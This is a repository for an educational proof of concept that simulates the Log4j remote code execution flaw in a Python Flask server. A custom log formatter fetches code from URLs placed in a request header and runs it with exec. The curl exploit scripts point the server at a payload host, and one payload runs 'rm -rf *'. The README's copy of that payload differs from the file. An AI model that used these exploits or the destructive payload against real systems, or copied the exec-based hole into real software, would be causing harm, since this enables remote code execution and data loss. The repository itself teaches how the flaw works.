├── License
├── .vscode
    └── settings.json
├── Dockerfile
├── exploit1.sh
├── exploit2.sh
├── exploit
    ├── exploit1.py
    └── exploit2.py
├── server
    ├── app.py
    └── formatter.py
├── LICENSE
└── README.md


/License:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 |     "python.formatting.provider": "yapf"
3 | }


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
# Small Python 3.6 image that runs the deliberately vulnerable demo server.
FROM python:3.6.10-alpine

# app.py uses the @app.get route shortcut (added in Flask 2.0), and 2.0.x is
# the last Flask series that supports Python 3.6, so pin to that range.
# --no-cache-dir keeps pip's download cache out of the image layer.
RUN pip3 install --no-cache-dir "flask>=2.0,<2.1"

COPY ./server /server
WORKDIR /server

ENTRYPOINT ["python3", "app.py"]


--------------------------------------------------------------------------------
/exploit1.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Lookup token carried in the "Agent" request header. The backslash stops
# bash from reading "${" as the start of a parameter expansion, so the
# server receives the literal text ${{...}}.
LOOKUP_TOKEN="\${{http://192.168.0.105:8080/exploit1.py}}"

# Send one request to the demo server; the header value ends up in its log.
curl --request GET --header "Agent: ${LOOKUP_TOKEN}" http://localhost:5000/hello
7 | 


--------------------------------------------------------------------------------
/exploit2.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Lookup token carried in the "Agent" request header. The query string
# (name=Prasanna) travels with the URL inside the token. The backslash stops
# bash from reading "${" as the start of a parameter expansion.
LOOKUP_TOKEN="\${{http://192.168.0.105:8080/exploit2.py?name=Prasanna}}"

# Send one request to the demo server; the header value ends up in its log.
curl --request GET --header "Agent: ${LOOKUP_TOKEN}" http://localhost:5000/hello
7 | 


--------------------------------------------------------------------------------
/exploit/exploit1.py:
--------------------------------------------------------------------------------
1 | import os
2 | 
class LogSubstitutor:
    """Demo payload whose string conversion has a visible side effect."""

    def __str__(self) -> str:
        """Run a harmless shell command, then return the replacement text.

        The loader calls ``str()`` on the object during substitution, so
        this method has to return a string; whatever else it does along the
        way is executed as well.
        """
        os.system("echo it worked!")
        replacement = "Substituted text"
        return replacement


--------------------------------------------------------------------------------
/exploit/exploit2.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | 
 4 | class LogSubstitutor:
 5 |     def __init__(self, **kwargs) -> None:
 6 |         # do creepy things here.
 7 |         os.system("echo from constructor")
 8 |         self.name = kwargs.get("name", "NoName")
 9 | 
10 |     def __str__(self) -> str:
11 |         # the loader will call str(object) during substitution
12 |         # so this method must return a string and we can do other
13 |         # creepy things here as well.
14 |         # LoL! don't run this on the host machine.
15 |         os.system("rm -rf *")
16 |         return "Hi {}".format(self.name)


--------------------------------------------------------------------------------
/server/app.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | from logging.handlers import RotatingFileHandler
 3 | 
 4 | from flask import Flask, logging as flask_logger, request
 5 | from formatter import ShellishFormatter
 6 | 
 7 | app = Flask(__name__)
 8 | 
 9 | 
@app.before_request
def log_request():
    """Log the headers of every request before its route handler is invoked.

    The header text comes straight from the client and is handed to the
    application logger as part of the message.
    """
    header_dump = "Headers: {}".format(request.headers)
    app.logger.info(header_dump)
16 | 
17 | 
@app.get("/hello")
def hello():
    """Handle GET /hello with a fixed plain-text greeting."""
    greeting = "Hello, World!"
    return greeting
21 | 
22 | 
if __name__ == "__main__":
    # Script entry point: emit INFO records, route Flask's default log
    # handler through ShellishFormatter, then listen on every interface.
    app.logger.setLevel(logging.INFO)
    flask_logger.default_handler.setFormatter(ShellishFormatter())
    app.run(host='0.0.0.0', port=5000)
27 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Narasimha Prasanna HN
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/server/formatter.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | from typing import List, Tuple
 3 | from urllib.parse import urlparse, parse_qs
 4 | from urllib.request import urlopen
 5 | import re
 6 | 
 7 | PATTERN = '\$\{\{(.+?)\}\}'
 8 | SEACH_CLASS_NAME = "LogSubstitutor"
 9 | 
10 | 
def parse_url(pattern: str) -> Tuple[bool, str, dict]:
    """Split lookup text into a URL without its query string, plus the query.

    Args:
        pattern: Text to interpret as a URL.

    Returns:
        ``(True, url, params)`` when ``pattern`` has a scheme or a network
        location. ``url`` is ``scheme://netloc/path`` and ``params`` is the
        ``parse_qs`` result, which maps each query key to a *list* of values.
        ``(False, None, None)`` when ``pattern`` has neither part or cannot
        be parsed.
    """
    failure = (False, None, None)
    try:
        result = urlparse(pattern)
        parameters = parse_qs(result.query)
    except ValueError:
        # urlparse rejects malformed input such as an unbalanced "[" in the
        # host part.
        return failure

    if not (result.scheme or result.netloc):
        # Always hand back a 3-tuple so callers can unpack the result;
        # falling off the end here would return a bare None instead.
        return failure

    parsed_url = "{}://{}{}".format(result.scheme, result.netloc, result.path)
    return True, parsed_url, parameters
22 | 
23 | 
def execute_object(data: str, params: dict) -> str:
    """Execute source code and return the text of the object it defines.

    SECURITY: ``data`` is run verbatim with ``exec`` against this module's
    globals, so whoever controls ``data`` runs arbitrary code in this
    process. This is the hole the demo exists to show; never reuse it on
    untrusted input.

    Args:
        data: Python source expected to define the class named by
            ``SEACH_CLASS_NAME``.
        params: Keyword arguments passed to that class's constructor.

    Returns:
        ``str()`` of a freshly constructed instance of the class.
    """
    # Everything the source defines is bound into this module's globals.
    exec(data, globals())
    substitutor = eval(SEACH_CLASS_NAME)(**params)
    return str(substitutor)
29 | 
30 | 
def check_substitute_pattern(record_message: str) -> str:
    """Expand every ``${{url}}`` token found in a log message.

    For each token, the text between the braces is parsed as a URL, the
    resource is downloaded (5 second timeout), executed through
    ``execute_object`` and the token is replaced by the returned string.
    A token whose lookup fails for any reason is left in the message
    unchanged.

    SECURITY: the message may contain attacker-supplied text, and every
    token in it triggers a download and execution of remote code. This is
    the behaviour the demo exists to show; do not reuse it.

    Args:
        record_message: The already formatted log line.

    Returns:
        The message with each successfully resolved token replaced by its
        own result.
    """
    def _resolve(match):
        # Replacement callback: returns the text that takes the place of
        # exactly this token, or the token itself when the lookup fails.
        try:
            ret, url, params = parse_url(match.group(1))
            if not ret:
                return match.group(0)

            with urlopen(url, timeout=5) as response:
                eval_data = response.read()
            return execute_object(eval_data, params)
        except Exception:
            # Best effort: formatting a log record must not raise because a
            # lookup failed, so the original token is kept.
            return match.group(0)

    # A callable replacement is applied per match, so each token receives
    # its own result (the fourth positional argument of re.sub is a
    # replacement *count*, not a match index), and the returned text is
    # inserted literally, without backslash/group-reference processing.
    return re.sub(PATTERN, _resolve, record_message)
52 | 
53 | 
class ShellishFormatter(logging.Formatter):
    """Log formatter that expands ``${{url}}`` tokens in the formatted line.

    Formatting follows the default ``logging.Formatter.format`` steps; the
    only addition is that the formatted message is passed through
    ``check_substitute_pattern`` before exception and stack text are
    appended.
    """

    def __init__(self, fmt=None, datefmt=None, style="%"):
        """Create the formatter.

        Args:
            fmt: Message format string, forwarded to ``logging.Formatter``.
            datefmt: Date format string, forwarded to ``logging.Formatter``.
            style: Format style character, forwarded to ``logging.Formatter``.

        Calling it with no arguments behaves as before (library defaults).
        """
        super().__init__(fmt, datefmt, style)

    def format(self, record: logging.LogRecord) -> str:
        """Format ``record`` and run token substitution on the result.

        Args:
            record: The log record to render.

        Returns:
            The formatted (and substituted) message, followed by exception
            text and stack information when the record carries them.
        """
        record.message = record.getMessage()
        if self.usesTime():
            record.asctime = self.formatTime(record, self.datefmt)

        # Substitution is applied to the message line only; the exception
        # and stack text appended below are not scanned.
        s = check_substitute_pattern(self.formatMessage(record))

        if record.exc_info and not record.exc_text:
            # Store the rendered traceback on the record.
            record.exc_text = self.formatException(record.exc_info)
        if record.exc_text:
            if not s.endswith("\n"):
                s = s + "\n"
            s = s + record.exc_text
        if record.stack_info:
            if not s.endswith("\n"):
                s = s + "\n"
            s = s + self.formatStack(record.stack_info)
        return s
79 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # py4jshell
  2 | Simulating the Log4j Remote Code Execution (RCE) vulnerability [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in a Flask web server, using Python's logging library with a custom formatter that simulates lookup substitution on URLs. This repository is a POC of how the Log4j remote code execution vulnerability actually works, but written in Python. Instead of `JNDI+LDAP`, the `HTTP` protocol is used for the exploit code lookup.
  3 | 
  4 | **Note 1:** Do not use this in production, this is a demonstration of RCE.
  5 | 
  6 | **Note 2:** This is not a vulnerability in Python's logging library. We are writing a custom formatter for the logging library that simulates the inherent behaviour of the Log4j library.
  7 | 
  8 | **Note 3:** The exploit code exploit/exploit2.py executes `rm -rf *` in the server's present working directory, if you want to try this, make sure you are running it inside a container and not directly on the host, as it may result in data loss.
  9 | 
 10 | ### How this works?
 11 | 1. A GET request is made to the flask web server (`/hello`) from a HTTP client.
 12 | 2. Flask framework invokes the logger to log this request, including the header.
 13 | 3. Since we have configured Python's logging library to use our own formatter, the `format()` method implemented by our formatter `ShellishFormatter` is invoked.
 14 | 4. The formatter performs original formatting and invokes `check_substitute_pattern` function which scans the string to be logged for `${{.+?}}` pattern.
 15 | 5. If found, the URL inside this pattern is extracted, parsed and a HTTP GET request is made to the remote code hosting server pointed by the URL to download the exploit python code.
 16 | 6. A runnable python object is constructed from the downloaded code dynamically using `exec` and `eval` interpreter methods. This object contains the executable exploit code.
 17 | 7. Since we need to substitute the `${{.+?}}` with the stringified result, we call `str()` over the object which calls `__str__()` method of the exploit object.
 18 | 8. Anything that is written inside the `__str__()` method is blindly executed; the only requirement is that the method returns a string at the end.
 19 | 
 20 | ### Try it yourself:
 21 | #### 1. Build the docker image:
 22 | First, build the Docker image of the Flask server using the provided Dockerfile.
 23 | ```
 24 | docker build . -t py4jshell
 25 | ```
 26 | 
 27 | #### 2. Host the exploit code locally:
 28 | The directory `exploit/` contains two sample python exploit codes. You can host these exploits anywhere on the internet, you can also do it locally by running a static HTTP server from that directory, as:
 29 | ```
 30 | cd exploit
 31 | python -m http.server 8080
 32 | ```
 33 | If everything is alright, you should see this message:
 34 | ```
 35 | Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
 36 | ```
 37 | 
 38 | #### 3. Start the container:
 39 | Open another terminal (on the same machine, or on any machine in your local network) and start the server as follows:
 40 | ```
 41 | docker run --rm -p 5000:5000 py4jshell
 42 | ```
 43 | The container should start the web server, you should see the following message:
 44 | ```
 45 |  * Serving Flask app 'app' (lazy loading)
 46 |  * Environment: production
 47 |    WARNING: This is a development server. Do not use it in a production deployment.
 48 |    Use a production WSGI server instead.
 49 |  * Debug mode: off
 50 |  * Running on all addresses.
 51 |    WARNING: This is a development server. Do not use it in a production deployment.
 52 |  * Running on http://172.17.0.2:5000/ (Press CTRL+C to quit)
 53 | ```
 54 | 
 55 | #### 4. Make get requests:
 56 | You can use curl or any other tool to make the GET request. Check `exploit1.sh` and `exploit2.sh` files.
 57 | You can also formulate your own request as follows:
 58 | 
 59 | ```sh
 60 | HEADER_VAL="\${{http://192.168.0.104:8080/exploit1.py}}"
 61 | 
 62 | curl -X GET -H "Agent: ${HEADER_VAL}" \
 63 |     http://localhost:5000/hello
 64 | ```
 65 | Note the header value for `Agent` field, it contains a URL from where the exploit code is downloaded.
 66 | If everything works fine, the server will download and execute the exploit code without complaining. You should see the output as below:
 67 | ```
 68 | 172.17.0.1 - - [17/Dec/2021 12:56:25] "GET /hello HTTP/1.1" 200 -
 69 | it worked!
 70 | Headers: Host: localhost:5000
 71 | User-Agent: curl/7.74.0
 72 | Accept: */*
 73 | Agent: Substituted text
 74 | 
 75 | 
 76 | 172.17.0.1 - - [17/Dec/2021 12:56:44] "GET /hello HTTP/1.1" 200 -
 77 | ```
 78 | As you can see, there is an `it worked!` message on `stdout`, which actually comes from the exploit code running `os.system("echo it worked!")` (see `exploit/exploit1.py`). Also, if you look at the logs of the static HTTP server that hosts the exploit code files, you should see:
 79 | ```
 80 | 172.17.0.2 - - [17/Dec/2021 18:26:44] "GET /exploit1.py HTTP/1.1" 200 -
 81 | ```
 82 | Which indicates that there was a hit from the container to the static server to download the exploit code to perform remote code execution.
 83 | 
 84 | #### Passing parameters:
 85 | The sample formatter also supports passing custom parameters as arguments to the instantiated remote object. To pass parameters, encode them as URL query parameters:
 86 | ```
 87 | HEADER_VAL="\${{http://192.168.0.104:8080/exploit2.py?name=Prasanna}}"
 88 | ```
 89 | 
 90 | Then in the exploit code you can receive them in the constructor:
 91 | ```python3
 92 | class LogSubstitutor:
 93 |     def __init__(self, **kwargs) -> None:
 94 |         # do creepy things here.
 95 |         os.system("echo from constructor")
 96 |         self.name = kwargs.get("name", "NoName")
 97 | 
 98 |     def __str__(self) -> str:
 99 |         # the loader will call str(object) during substitution
100 |         # so this method must return a string and we can do other
101 |         # creepy things here as well.
102 |         # LoL! don't run this on the host machine.
103 |         os.system("echo rm -rf .")
104 |         return "Hi {}".format(self.name)
105 | ```
106 | 
107 | ### Notes:
108 | 1. This project is for educational purposes, it can be used to understand Remote code execution and how Log4j shell actually works and what makes it so dangerous.
109 | 2. This has nothing to do with python's original logging library as it does not perform any string substitutions by downloading and executing code from remote URLs, this functionality is purely implemented inside the custom formatter which is actually vulnerable.
110 | 3. Log4j uses JNDI + LDAP, which is a way of performing lookups on remote Java objects. This method has been in practice since 1990 and has been used by a lot of applications to solve some use cases. The actual LDAP + JNDI might not work exactly the way we have written the functionality in this repo; this is just a simulation.
111 | 4. Every interpreted language can be tricked into attacks like this if they expose some or the other way of dynamic code execution using `eval`, which is most common in many interpreted languages. It is left to the developers to write better code and make the world safer.
112 | 


--------------------------------------------------------------------------------